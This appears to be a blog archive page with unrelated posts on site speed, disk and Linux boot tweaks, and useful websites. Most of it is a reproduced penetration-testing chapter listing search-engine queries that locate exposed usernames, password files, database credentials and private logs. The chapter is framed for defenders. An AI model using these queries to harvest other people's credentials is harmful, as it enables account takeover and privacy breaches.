Pages

Social Networking

FREE WEB HOSTING

Free Website Hosting
Showing posts with label Send fake emails from anonymous account.... Show all posts
Showing posts with label Send fake emails from anonymous account.... Show all posts

Boost up your site load time

This article by Drunkadmin had hit the front pages of Digg. It gives a good idea on optimizing web pages that will definitely increase a website's loading time.
Host Images And Files Somewhere Else
Many users online at the same time can cause your server to handle a lot of requests. Its best that if you are using images in your site, make sure you upload them to image host sites like ImageShack. This will greatly reduce the bandwidth used by your server and also make your blog faster as image upload sites have a better speed.
Best place to host files of sizes 2-5mb (Any thing you need to provide users for download) is to use Google Pages as your host.
Optimize Your CSS
Nowadays many sites have started to use CSS based formatting. Even if Style Sheets are naturally more efficient than HTML tables you can still optimize the CSS code to make your website cleaner and faster. Having a clean CSS can reduce the time taken by the clients browser to decode your site.
Manual Clean
Try to locate dispersed code and aggregate it together.
For example instead of
margin-top: 20px;
margin-right: 10px;
margin-bottom: 20px;
margin-left: 10px;
Write
margin: 20px 10px 20px 10px;
You can use the tool Clean CSS to optimize your CSS and remove useless property declaration and whitespaces.
Optimize Your Images
Use image formats such as PNG, JPG,/JPEG And GIF. Always use the “Save for web” image quality which is available in most softwares such as Adobe Photoshop.
Use Height/Width Tag In Images
Most people dont add hieght and width tag to images. These tags make sure that the browser knows the dimensions of images before it has completed downloading the image. If the browser does not see those tags it will need to figure the size of the image, then load the image and then load the rest of the page.
When the height and width tags are included the browser will automatically know the size of the image. As a consequence it will be able to hold a place for the image and load the rest of the page simultaneously. Apart from the improvement on the load time of the page this method is also more user friendly since the visitor can start reading the text or other information while the image is being downloaded.
Use Less Javascript!
Some people tend to add a lot of javascript effects to their site. Using excessive javascript animations may cause clients browser to freeze for some time annoying the user.


  • Optimize Links
    Make sure that the outlinks from your blog and link between posts are optimized well. For example if link is www.domain.com/blog make sure you write it as www.domain.com/blog/ to prevent one extra request which would be made to the server if the former link is used.
    The improvement on the loading time of links ending with a slash will not be astronomical, but when it comes to speeding up a website every small bit helps!




  • Reduce HTTP Requests To Server
    When opening a web page every object (images, scripts and the line) will require a round trip to the server. This latency can add several seconds to the load time of your site. Make sure to reduce the number of objects and to combine CSS files and scripts together.


  • Boost HDD Performance:

    Often I hear my friends complaining about slow hard drives. Yesterday one of my classmates asked me how to boost the performance of his new harddrive. I told him about a simple and very easy tweak, that would significantly increase the performance of his hard drive.

    Win9x sets DMA to OFF by default. You have to switch it on. In theory, enabling DMA increases UDMA Hard Disk access to 33.3 MB/sec. In practice, speed will increase substantially from the old standard of 16MB/sec. Furthermore, DMA uses only 25% of CPU resources compared to 40% normally. Nearly all 5400rpm/7200rpm, and some lower speed, drives, support DMA.

    Now I'll tell you about it. Ready ?

    Right-click on "my computer". Now click on "properties". Now search for "devide manager" and click properties of your hard drive. It should have an option called "DMA". By enabling this, your hard drive should show an increase in performance. Also, this method can increase the transfer rate of your CD/DVD-ROM or CD/DVD-Writer, possibly eliminating those under buffer run errors.

    Again, an easy tweak which could improve you hard drive's performance

    Search passwords and Juicy Info : Digg Google

    Introduction

    This is not about finding sensitive data during an assessment as much as
    it is about what the “bad guys” might do to troll for the data.The examples presented
    generally represent the lowest-hanging fruit on the security
    tree. Hackers target this information on a daily basis.To protect against this type
    of attacker, we need to be fairly candid about the worst-case possibilities.We
    won’t be overly candid, however.
    We start by looking at some queries that can be used to uncover usernames,
    the less important half of most authentication systems.The value of a username is
    often overlooked, but, an entire multimilliondollar
    security system can be shattered through skillful crafting of even the
    smallest, most innocuous bit of information.
    Next, we take a look at queries that are designed to uncover passwords. Some
    of the queries we look at reveal encrypted or encoded passwords, which will take
    a bit of work on the part of an attacker to use to his or her advantage.We also
    take a look at queries that can uncover cleartext passwords.These queries are some
    of the most dangerous in the hands of even the most novice attacker. What could
    make an attack easier than handing a username and cleartext password to an
    attacker?
    We wrap up by discussing the very real possibility of uncovering
    highly sensitive data such as credit card information and information used to
    commit identity theft, such as Social Security numbers. Our goal here is to
    explore ways of protecting against this very real threat.To that end, we don’t go
    into details about uncovering financial information and the like. If you’re a “dark
    side” hacker, you’ll need to figure these things out on your own.
    Searching for Usernames
    Most authentication mechanisms use a username and password to protect information.
    To get through the “front door” of this type of protection, you’ll need to
    determine usernames as well as passwords. Usernames also can be used for social
    engineering efforts, as we discussed earlier.
    Many methods can be used to determine usernames. In Chapter 10, we
    explored ways of gathering usernames via database error messages. In Chapter 8
    we explored Web server and application error messages that can reveal various
    information, including usernames.These indirect methods of locating usernames
    are helpful, but an attacker could target a usernames directory
    query like “your username is”. This phrase can locate help pages that describe the
    username creation process,
    information gleaned from other sources, such as Google Groups posts or phone
    listings.The usernames could then be recycled into various other phases of the
    attack, such as a worm-based spam campaign or a social-engineering attempt.An
    attacker can gather usernames from a variety of sources, as shown in the sample
    queries listed
    Sample Queries That Locate Usernames
    Query Description
    inurl:admin inurl:userlist Generic userlist files
    inurl:admin filetype:asp Generic userlist files
    inurl:userlist
    inurl:php inurl:hlstats intext: Half-life statistics file, lists username and
    Server Username other information
    filetype:ctl inurl:haccess. Microsoft FrontPage equivalent of htaccess
    ctl Basic shows Web user credentials
    Query Description
    filetype:reg reg intext: Microsoft Internet Account Manager can
    ”internet account manager” reveal usernames and more
    filetype:wab wab Microsoft Outlook Express Mail address
    books
    filetype:mdb inurl:profiles Microsoft Access databases containing (user)
    profiles.
    index.of perform.ini mIRC IRC ini file can list IRC usernames and
    other information
    inurl:root.asp?acs=anon Outlook Mail Web Access directory can be
    used to discover usernames
    filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
    conf –sample username and server information
    filetype:log username putty PUTTY SSH client logs can reveal usernames
    and server information
    filetype:rdp rdp Remote Desktop Connection files reveal user
    credentials
    intitle:index.of .bash_history UNIX bash shell history reveals commands
    typed at a bash command prompt; usernames
    are often typed as argument strings
    intitle:index.of .sh_history UNIX shell history reveals commands typed at
    a shell command prompt; usernames are
    often typed as argument strings
    “index of ” lck Various lock files list the user currently using
    a file
    +intext:webalizer +intext: Webalizer Web statistics page lists Web user-
    Total Usernames +intext: names and statistical information
    ”Usage Statistics for”
    filetype:reg reg HKEY_ Windows Registry exports can reveal
    CURRENT_USER username usernames and other information

    Underground Googling
    Searching for a Known Filename
    Remember that there are several ways to search for a known filename.
    One way relies on locating the file in a directory listing, like intitle:index.of
    install.log. Another, often better, method relies on the filetype operator,
    as in filetype:log inurl:install.log. Directory listings are not all that
    common. Google will crawl a link to a file in a directory listing, meaning
    that the filetype method will find both directory listing entries as well as
    files crawled in other ways.

    In some cases, usernames can be gathered from Web-based statistical programs
    that check Web activity.The Webalizer program shows all sorts of information
    about a Web server’s usage. Output files for the Webalizer program can be
    located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
    Statistics for”. Among the information displayed is the username that was used to
    connect to the Web server, as shown in Figure 9.2. In some cases, however, the
    usernames displayed are not valid or current, but the “Visits” column lists the
    number of times a user account was used during the capture period.This enables
    an attacker to easily determine which accounts are more likely to be valid.


    The Windows registry holds all sorts of authentication information, including
    usernames and passwords.Though it is unlikely (and fairly uncommon) to locate
    live, exported Windows registry files on the Web, at the time of this writing
    there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
    username, which locates Windows registry files that contain the word username
    and in some cases passwords,



    As any talented attacker or security person will tell you, it’s rare to get information
    served to you on a silver platter. Most decent finds take a bit of persistence,
    creativity, intelligence, and just a bit of good luck. For example, consider
    the Microsoft Outlook Web Access portal, which can be located with a query
    like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
    returned by this query, even though there a certainly more than 50 sites running
    the Microsoft Web-based mail portal. Regardless of how you might locate a site
    running this e-mail gateway, it’s not uncommon for the site to host a public
    directory (denoted “Find Names,” by default)


    The public directory allows access to a search page that can be used to find
    users by name. In most cases, wildcard searching is not allowed, meaning that a
    search for * will not return a list of all users, as might be expected. Entering a
    search for a space is an interesting idea, since most user descriptions contain a
    space, but most large directories will return the error message “This query would
    return too many addresses!” Applying a bit of creativity, an attacker could begin
    searching for individual common letters, such as the “Wheel of Fortune letters”
    R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
    of user information like


    Once a list of user information is returned, the attacker can then recycle the
    search with words contained in the user list, searching for the words Voyager,
    Freshmen, or Campus, for example.Those results can then be recycled, eventually
    resulting in a nearly complete list of user information.
    Searching for Passwords
    Password data, one of the “Holy Grails” during a penetration test, should be protected.
    Unfortunately, many examples of Google queries can be used to locate
    passwords on the Web, as shown in Table 9.2.
    Table 9.2 Queries That Locate Password Information
    Query Description
    inurl:/db/main.mdb ASP-Nuke passwords
    filetype:cfm “cfapplication ColdFusion source with potential passwords
    name” password
    filetype:pass pass intext:userid dbman credentials
    allinurl:auth_user_file.txt DCForum user passwords
    eggdrop filetype:user user Eggdrop IRC user credentials
    filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials
    filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords
    +inurl:”@”
    inurl:zebra.conf intext: GNU Zebra passwords
    password -sample -test
    -tutorial –download
    filetype:htpasswd htpasswd HTTP htpasswd Web user credentials
    intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
    “htgroup” -intitle:”dist”
    -apache -htpasswd.c
    intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
    htpasswd.bak
    “http://*:*@www” bob:bob HTTP passwords (bob is a sample username)
    “sets mode: +k” IRC channel keys (passwords)
    “Your password is * Remember IRC NickServ registration passwords
    this for later use”
    signin filetype:url JavaScript authentication credentials

    Queries That Locate Password Information
    Query Description
    LeapFTP intitle:”index.of./” LeapFTP client login credentials
    sites.ini modified
    inurl:lilo.conf filetype:conf LILO passwords
    password -tatercounter2000
    -bootpwd –man
    filetype:config config intext: Microsoft .NET application credentials
    appSettings “User ID”
    filetype:pwd service Microsoft FrontPage Service Web passwords
    intitle:index.of Microsoft FrontPage Web credentials
    administrators.pwd
    “# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords
    ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords
    (Service | authors | administrators)
    inurl:perform filetype:ini mIRC nickserv credentials
    intitle:”index of” intext: mySQL database credentials
    connect.inc
    intitle:”index of” intext: mySQL database credentials
    globals.inc
    filetype:conf oekakibbs Oekakibss user passwords
    filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials
    inurl:ospfd.conf intext: OSPF Daemon Passwords
    password -sample -test
    -tutorial –download
    index.of passlist Passlist user credentials
    inurl:passlist.txt passlist.txt file user credentials
    filetype:dat “password.dat” password.dat files
    inurl:password.log filetype:log password.log file reveals usernames, passwords,
    and hostnames
    filetype:log inurl:”password.log” password.log files cleartext passwords
    inurl:people.lst filetype:lst People.lst generic password file
    intitle:index.of config.php PHP Configuration File database credentials
    inurl:config.php dbuname dbpass PHP Configuration File database credentials
    inurl:nuke filetype:sql PHP-Nuke credentials
    Queries That Locate Password Information
    Query Description
    filetype:conf inurl:psybnc.conf psyBNC IRC user credentials
    “USER.PASS=”
    filetype:ini ServUDaemon servU FTP Daemon credentials
    filetype:conf slapd.conf slapd configuration files root password
    inurl:”slapd.conf” intext: slapd LDAP credentials
    ”credentials” -manpage
    -”Manual Page” -man: -sample
    inurl:”slapd.conf” intext: slapd LDAP root password
    ”rootpw” -manpage
    -”Manual Page” -man: -sample
    filetype:sql “IDENTIFIED BY” –cvs SQL passwords
    filetype:sql password SQL passwords
    filetype:ini wcx_ftp Total Commander FTP passwords
    filetype:netrc password UNIX .netrc user credentials
    index.of.etc UNIX /etc directories contain various credential
    files
    intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials
    intitle:index.of passwd UNIX /etc/passwd user credentials
    passwd.bak
    intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials
    intitle:Index.of etc shadow UNIX /etc/shadow user credentials
    intitle:index.of master.passwd UNIX master.passwd user credentials
    intitle:”Index of” spwd.db UNIX spwd.db credentials
    passwd -pam.conf
    filetype:bak inurl:”htaccess| UNIX various password file backups
    passwd|shadow|htusers
    filetype:inc dbconn Various database credentials
    filetype:inc intext:mysql_ Various database credentials, server names
    connect
    filetype:properties inurl:db Various database credentials, server names
    intext:password
    inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords
    inurl:”wvdial.conf” intext: wdial dialup user credentials

    Queries That Locate Password Information
    Query Description
    filetype:mdb wwforum Web Wiz Forums Web credentials
    “AutoCreate=TRUE password=*”Website Access Analyzer user passwords
    filetype:pwl pwl Windows Password List user credentials
    filetype:reg reg +intext: Windows Registry Keys containing user
    ”defaultusername” intext: credentials
    ”defaultpassword”
    filetype:reg reg +intext: Windows Registry Keys containing user
    ”internet account manager” credentials
    “index of/” “ws_ftp.ini” WS_FTP FTP credentials
    “parent directory”
    filetype:ini ws_ftp pwd WS_FTP FTP user credentials
    inurl:/wwwboard wwwboard user credentials
    In most cases, passwords discovered on the Web are either encrypted or
    encoded in some way. In most cases, these passwords can be fed into a password
    cracker such as John the Ripper from www.openwall.com/john to produce
    plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
    the search ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators), which
    combines a search for some common

    Exported Windows registry files often contain encrypted or encoded passwords
    as well. If a user exports the Windows registry to a file and Google subsequently
    crawls that file, a query like filetype:reg intext:”internet account manager”
    could reveal interesting keys containing password data

    ress. Note that live, exported Windows registry files are not very common, but it’s
    not uncommon for an attacker to target a site simply because of one exceptionally
    insecure file. It’s also possible for a Google query to uncover cleartext passwords.
    These passwords can be used as is without having to employ a
    password-cracking utility. In these extreme cases, the only challenge is determining
    the username as well as the host on which the password can be used. As
    shown in Figure 9.8, certain queries will locate all the following information:
    usernames, cleartext passwords, and the host that uses that authentication!


    There is no magic query for locating passwords, but during an assessment,
    remember that the simplest queries directed at a site can have amazing results, as
    we discussed in , Chapter 7, Ten Simple Searches. For example, a query like “Your
    password” forgot would locate pages that provide a forgotten password recovery
    mechanism.The information from this type of query can be used to formulate
    any of a number of attacks against a password. As always, effective social engineering
    is a terrific nontechnical solution to “forgotten” passwords.
    Another generic search for password information, intext:(password | passcode |
    pass) intext:(username | userid | user), combines common words for passwords and
    user IDs into one query.This query returns a lot of results, but the vast majority
    of the top hits refer to pages that list forgotten password information, including
    either links or contact information. Using Google’s translate feature, found at
    http://translate.google.com/translate_t, we could also create multilingual password
    searches.Table 9.3 lists common translations for the word password
    English Translations of the Word Password
    Language Word Translation
    German password Kennwort
    Spanish password contraseña
    French password mot de passe
    Italian password parola d’accesso
    Portuguese password senha
    Dutch password Paswoord
    NOTE
    The terms username and userid in most languages translate to username
    and userid, respectively.
    Searching for Credit Card Numbers,
    Social Security Numbers, and More
    Most people have heard news stories about Web hackers making off with customer
    credit card information.With so many fly-by night retailers popping up
    on the Internet, it’s no wonder that credit card fraud is so prolific.These momand-
    pop retailers are not the only ones successfully compromised by hackers.
    Corporate giants by the hundreds have had financial database compromises over
    the years, victims of sometimes very technical, highly focused attackers. What
    might surprise you is that it doesn’t take a rocket scientist to uncover live credit
    card numbers on the Internet, thanks to search engines like Google. Everything
    from credit information to banking data or supersensitive classified government
    documents can be found on the Web. Consider the (highly edited) Web page

    This document, found using Google, lists hundreds and hundreds of credit
    card numbers (including expiration date and card validation numbers) as well as
    the owners’ names, addresses, and phone numbers.This particular document also
    included phone card (calling card) numbers. Notice the scroll bar on the righthand
    side of Figure 9.9, an indicator that the displayed page is only a small part
    of this huge document—like many other documents of its kind. In most cases,
    pages that contain these numbers are not “leaked” from online retailers or ecommerce
    sites but rather are most likely the fruits of a scam known as phishing,
    in which users are solicited via telephone or e-mail for personal information.
    Several Web sites, including MillerSmiles.co.uk, document these scams and
    hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
    encourages users to update their eBay profile information.


    Once a user fills out this form, all the information is sent via e-mail to the
    attacker, who can use it for just about anything.
    Tools and Traps
    Catching Online Scammers
    In some cases, you might be able to use Google to help nab the bad guys.
    Phishing scams are effective because the fake page looks like an official
    page. To create an official-looking page, the bad guys must have examples
    to work from, meaning that they must have visited a few legitimate companies’
    Web sites. If the fishing scam was created using text from several
    companies’ existing pages, you can key in on specific phrases from the fake
    page, creating Google queries designed to round up the servers that hosted
    some of the original content. Once you’ve located the servers that contained
    the pilfered text, you can work with the companies involved to
    extract correlating connection data from their log files. If the scammer visited
    each company’s Web page, collecting bits of realistic text, his IP should
    appear in each of the log files. Auditors at SensePost (www.sensepost.com)
    have successfully used this technique to nab online scam artists.
    Unfortunately, if the scammer uses an exact copy of a page from only one
    company, this task becomes much more difficult to accomplish.
    Social Security Numbers
    Social Security numbers (SSNs) and other sensitive data can be easily located
    with Google as well as via the same techniques used to locate credit card numbers.
    For a variety of reasons, SSNs might appear online—for example, educational
    facilities are notorious for using an SSN as a student ID, then posting
    grades to a public Web site with the “student ID” displayed next to the grade.A
    creative attacker can do quite a bit with just an SSN, but in many cases it helps
    to also have a name associated with that SSN. Again, educational facilities have
    been found exposing this information via Excel spreadsheets listing student’s
    names, grades, and SSNs, despite the fact that the student ID number is often
    used to help protect the privacy of the student! Although we don’t feel it’s right
    to go into the details of how this data is located, several media outlets have irresponsibly
    posted the details online. Although the blame lies with the sites that are
    leaking this information, in our opinion it’s still not right to draw attention to
    how exactly the information can be located.
    Personal Financial Data
    In some cases, phishing scams are responsible for publicizing personal information;
    in other cases, hackers attacking online retails are to blame for this breach of
    privacy. Sadly, there are many instances where an individual is personally responsible
    for his own lack of privacy. Such is the case with personal financial information.
    With the explosion of personal computers in today’s society, users have
    literally hundreds of personal finance programs to choose from. Many of these
    programs create data files with specific file extensions that can be searched with
    Google. It’s hard to imagine why anyone would post personal financial information
    to a public Web site (which subsequently gets crawled by Google), but it
    must happen quite a bit, judging by the number of hits for program files generated
    by Quicken and Microsoft Money, for example. Although it would be
    somewhat irresponsible to provide queries here that would unearth personal
    financial data, it’s important to understand the types of data that could potentially
    be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
    financial, accounting, and tax return programs. Ensure that these filetypes
    aren’t listed on a webserver you’re charged with protecting.
    File Extension Description
    afm Abassis Finance Manager
    ab4 Accounting and Business File
    mmw AceMoney File
    Iqd AmeriCalc Mutual Fund Tax Report
    et2 Electronic Tax Return Security File (Australia)
    tax Intuit TurboTax Tax Return
    t98-t04 Kiplinger Tax Cut File (extension based on two-digit return
    year)
    mny Microsoft Money 2004 Money Data Files
    mbf Microsoft Money Backup Files
    inv MSN Money Investor File
    ptdb Peachtree Accounting Database
    qbb QuickBooks Backup Files reveal financial data
    qdf Quicken personal finance data
    soa Sage MAS 90 accounting software
    sdb Simply Accounting
    stx Simply Tax Form
    tmd Time and Expense Tracking
    tls Timeless Time & Expense
    fec U.S. Federal Campaign Expense Submission
    wow Wings Accounting File
    Searching for Other Juicy Info
    As we’ve seen, Google can be used to locate all sorts of sensitive information. In
    this section we take a look at some of the data that Google can find that’s harder
    to categorize. From address books to chat log files and network vulnerability
    reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
    that can be used to uncover various types of sensitive data.
    Query Description
    intext:”Session Start AIM and IRC log files
    * * * *:*:* *” filetype:log
    filetype:blt blt +intext: AIM buddy lists
    screenname
    buddylist.blt AIM buddy lists
    intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,
    shows IRC servers and user credentials
    inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,
    shows IRC servers and user credentials
    “Index of” / “chat/logs” Chat logs
    intitle:”Index Of” cookies.txt cookies.txt file reveals user information
    “size”
    “phone * * *” “address *” Curriculum vitae (resumes) reveal names
    “e-mail” intitle:”curriculum vitae” and address information
    ext:ini intext:env.ini Generic environment data
    intitle:index.of inbox Generic mailbox files
    “Running in Child mode” Gnutella client data and statistics
    “:8080” “:3128” “:80” HTTP Proxy lists
    filetype:txt
    intitle:”Index of” ICQ chat logs
    dbconvert.exe chats
    “sets mode: +p” IRC private channel information
    “sets mode: +s” IRC secret channel information
    “Host Vulnerability Summary ISS vulnerability scanner reports, reveal
    Report” potential vulnerabilities on hosts and
    networks
    “Network Vulnerability ISS vulnerability scanner reports, reveal
    Assessment Report” potential vulnerabilities on hosts and networks
    filetype:pot inurl:john.pot John the Ripper password cracker results
    intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic
    maillog size information
    ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders
    Query Description
    filetype:xls inurl:contact Microsoft Excel sheets containing contact
    information.
    intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess
    shows Web authentication info
    ext:log “Software: Microsoft Microsoft Internet Information Services
    Internet Information Services *.*” (IIS) log files
    filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar
    backup files
    intitle:index.of mt-db-pass.cgi Movable Type default file
    filetype:ctt ctt messenger MSN Messenger contact lists
    “This file was generated Nessus vulnerability scanner reports, reveal
    by Nessus” potential vulnerabilities on hosts and networks
    inurl:”newsletter/admin/” Newsletter administration information
    inurl:”newsletter/admin/” Newsletter administration information
    intitle:”newsletter admin”
    filetype:eml eml intext: Outlook Express e-mail files
    ”Subject” +From
    intitle:index.of inbox dbx Outlook Express Mailbox files
    intitle:index.of inbox dbx Outlook Express Mailbox files
    filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files
    inurl:/public/?Cmd=contents Outlook Web Access public folders or
    appointments
    filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files
    | Pluckerdb)
    “This is a Shareaza Node” Shareaza client data and statistics
    inurl:/_layouts/settings Sharepoint configuration information
    inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration
    information
    site:edu admin grades Student grades
    intitle:index.of mystuff.xml Trillian user Web links
    inurl:forward filetype: UNIX mail forward files reveal e-mail
    forward –cvs addresses
    intitle:index.of dead.letter UNIX unfinished e-mails

    Summary
    Make no mistake—there’s sensitive data on the Web, and Google can find it.
    There’s hardly any limit to the scope of information that can be located, if only
    you can figure out the right query. From usernames to passwords, credit card and
    Social Security numbers, and personal financial information, it’s all out there. As a
    purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
    tasked with securing a customer’s site from this dangerous form of
    information leakage, you could be overwhelmed by the sheer scale of your
    defensive duties.
    As droll as it might sound, a solid, enforced security policy is a great way to
    keep sensitive data from leaking to the Web. If users understand the risks associated
    with information leakage and understand the penalties that come with violating
    policy, they will be more willing to cooperate in what should be a security
    partnership.
    In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
    might employ in attacking a Web server. One thing that should become
    clear as you read this book is that any attacker has an overwhelming number of
    files to go after. One way to prevent dangerous Web information leakage is by
    denying requests for unknown file types. Whether your Web server normally
    serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
    be served by the Web server instead of focusing on what should not be served.
    Adjust your servers or your border protection devices to allow only specific content
    or file types.
    Solutions Fast Track
    Searching for Usernames
    _ Usernames can be found in a variety of locations.
    _ In some cases, digging through documents or e-mail directories might
    be required.
    _ A simple query such as “your username is” can be very effective in
    locating usernames.

    Searching for Passwords
    _ Passwords can also be found in a variety locations.
    _ A query such as “Your password” forgot can locate pages that provide a
    forgotten-password recovery mechanism.
    _ intext:(password | passcode | pass) intext:(username | userid | user) is
    another generic search for locating password information.
    Searching for Credit Cards
    Numbers, Social Security Numbers, and More
    _ Documents containing credit card and Social Security number
    information do exist and are relatively prolific.
    _ Some irresponsible news outlets have revealed functional queries that
    locate this information.
    _ There are relatively few examples of personal financial data online, but
    there is a great deal of variety.
    _ In most cases, specific file extensions can be searched for.
    Searching for Other Juicy Info
    _ From address books and chat log files to network vulnerability reports,
    there’s no shortage of sensitive data online.

    10 ways to Tweak your Linux Boot Process


    Linux rarely needs to be rebooted. But when it does, it’s often slow to boot. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult. (although some, unfortunately, are). Let’s take a look.

    #1: Disable unnecessary services

    Depending upon the use of the machine, plenty of services won’t be needed. Using Linux just for a desktop? Then you won’t need sendmail, httpd, and many other services. If your server is only a web server, you can shut off many services as well. To do this, you can go to the Administration menu and take a look at the Services entry. Just deselect all of the services you don’t want to start.

    #2: Disable unnecessary kernel modules

    If your desktop is wired to the Ethernet, you don’t need to have a wireless kernel module loaded. This task is a bit more difficult and will require a kernel recompilation, which is not the easiest task to undertake. To do this, you will need the kernel sources. Then, follow the standard steps for compiling a kernel. The difference is that you’re going to go through your system and disable all of the modules you don’t need.
    The best way to find out what kernel modules currently install and run on your system is to install Bootchart. Not only will this give you a good list of modules, it will illustrate for you what is happening during your system boot. You can also issue the command chkconfig –list | grep 3:on to find out what services are running. Once you know what loading modules you don’t need, you can remove them during a kernel recompilation. While you’re at it, compile the kernel to exactly match your architecture.

    #3: Use a lightweight window manager instead of GNOME or KDE

    I plug smaller footprint window managers for a reason — they drastically reduce graphical boot time. Instead of having to wait that extra 30 to 60 seconds for GNOME or KDE to boot up, why not wait two to 10 seconds for Enlightenment or XFCE to boot up? Not only will they save you boot time, they will save your memory and the headache of dealing with bloatware.

    #4: Use a text-based login instead of a graphical login

    Most of my Linux machines boot to run level 3 instead of run level 5. This will halt at the text-based login, where I only have to log in and issue startx to start my desktop of choice. The graphical logins do two things: increase load times and create headaches trying to recover from an X windows fubar.

    #5: Use a lighter-weight distribution

    Instead of loading the heavyweight Fedora, why not try a Gentoo, Arch, or Puppy Linux? The boot times for these smaller distributions are far faster than the more bloated Fedora (and even Ubuntu). Of the larger distributions, OpenSuSE claims to boot the fastest, but I have not personally tested this. Between the latest Fedora and Ubuntu, Ubuntu blows Fedora’s boot times away (and that is out of the box).

    #6: Use an OpenBIOS

    If you’re savvy enough to upgrade your PC’s firmware, you might consider migrating to an open source BIOS. One caveat to using open firmware is that it allows Linux to actually initialize the hardware as it boots (instead of relying on the BIOS). On top of that, many open BIOSes can be configured to meet your machine’s specific needs. If you don’t go the open BIOS route, you can at least configure your BIOS to not search for a floppy drive that’s not there or to boot directly to the first hard drive (instead of the CD drive first).

    #7: Avoid dhcp

    If you are working on a home network (or a small business network) where address lease isn’t a problem, go with static IP addresses. This will keep your machine from having to call out to a dhcp server to get an IP address. If you take this approach, make sure you configure your /etc/resolve.conf to reflect your DNS server addresses as well.

    #8: If you can spare it, get rid of hotplug

    Hotplug is the system that allows you to plug in new devices and use them immediately. If you know your server won’t need this system, delete it. This will cut down on boot time. On many systems, hotplugging consumes much of the boot time. Removing hotplug will vary depending upon the distribution you use. NOTE: udev has, for the most part, replaced hotplug. But if you’re running an older distribution, this does apply.

    #9: If you are REALLY daring, you could give initng a try

    The initng system serves as a replacement for the sysvinit system and promises to drastically decrease boot times in UNIX-like operating systems. If you would like to see the initng system in action, you can give the Pingwinek livecd a try.

    #10: Use a hack with Debian

    If you’re using Debian, there is a simple hack you can use to switch your startup scripts to run in parallel. If you look at the /etc/init.d/rc script, you will see: CONCURRENCY=none around line 24. Change this line to CONCURRENCY=shell and you should see a reduction in boot times.
    That’s about it. Of course there are always more and better hacks out there. But the above should mostly cover everything. The good news is that you’re most likely already running Linux, so the burden of boot times is generally eased by the infrequency of reboots.

    40 most usefull websites

    1. beFunky - Awesome web app that turns images to cartoonized paintings and videos to cartoons.
    2. DisplayWars - Incredibly simple tool that helps lots of people. Want to buy a new screen? DisaplyWars lets you compare screen sizes by mapping one display size on top of the other.
    3. DocSyncer - Synchronize office documents in your ‘My Documents’ folder with Google Docs account.
    4. JotYou - By using this service you can send messages to others so they get them only when they are in the area you specify.
    5. Keybr - Online keyboard to practice your touch typing skills.See also Typing Master
    6. Mint - The simplest way to manage your finances.
    7. Numbr - Free disposable phone numbers.
    8. PDFHammer - Merge, edit and rearrange PDF documents online.| Solid PDF Tools
    9. PhoneSpell - Ever wondered if you phone number spells something memorable ? PhoneSpell will find it out.
    10. SecondRotation / BuyMyTronics - Want to cash in on your old iPod ? Or mobile phone ? Both of these services will buy your old (broken) gadget, regardless of its condition.
    11. BeamIt - Send pictures, music, videos, docs or any other file to your cellphone.
    12. BooksInMyPhone - Download and read copyright-free books on a mobile phone. Comes with its own book reader.
    13. CallTheFuture - Schedule text messages and get them delivered (as a voicemail) on any desired date in the future.
    14. CameraSummary - Extracts so called EXIF data from the images. Shows what model of digicam was used, image creation date and time, resolution settings, location and so on.
    15. CanYouRunIt - One-click web app that inspects your PC’s hardware and software settings to determine whether or not it meets gaming requirements for a game of your choice.
    16. CellSwapper - Transfer your current mobile contract to someone else. Or get a free plan with only a short term contract.
    17. CivilAnswers - Free legal assistance.
    18. ControlC - This small cross-platform (Win, Mac, Linux) monitors your clipboard and saves everything online.
    19. Definr - Incredibly fast online dictionary. It takes abt 14 ms to lookup a word.
    20. Drop.io - By far the coolest service for private file collaboration and transfers. Add files by email, send voice messages from phone, etc.
    21. File-Destructor 2 - Generates files (Doc, PDF, … ) that look genuine but won’t launch properly. Basically, it’s a tool that helps you put all the blame on your “faulty computer”.
    22. File-encryptor - Secure encryption tool to freely encrypt/decrypt sensitive files online. Quite handy for sending over sensitive files.
    23. FlashPhone - Free flash-based SIP-softphone. Simply add your SIP account and you’re good to go. No need to install anything.
    24. Google Mobilizer - Makes your fav. websites mobile friendly. Must-have for your mobile bookmarks.
    25. GetMyFBIfile - Here you can generate letter templates that you can use to request for a free copy of your FBI file.
    26. LetterMeLater - Offers one feature that your email doesn’t have, ‘the ability to schedule when an email should be sent’. Coolest part about, you can use it directly from your email program (GMail, Outlook, etc.).
    27. Mailbucket - Finally, a tool to help you forward emails to your feedreader.
    28. Mobical - Over-the-air mobilebackup and restore service. Backup phone contacts, calendar, bookmarks and settings.
    29. MoDazzle - Access Facebook, LinkedIn and dozens of other web services (weather, stock quotes, etc.) via email or mobile text messaging. Update Facebook ’status’, get un-read messages from Facebook inbox, get someone’s profile info from LinkedIn, and lots more.
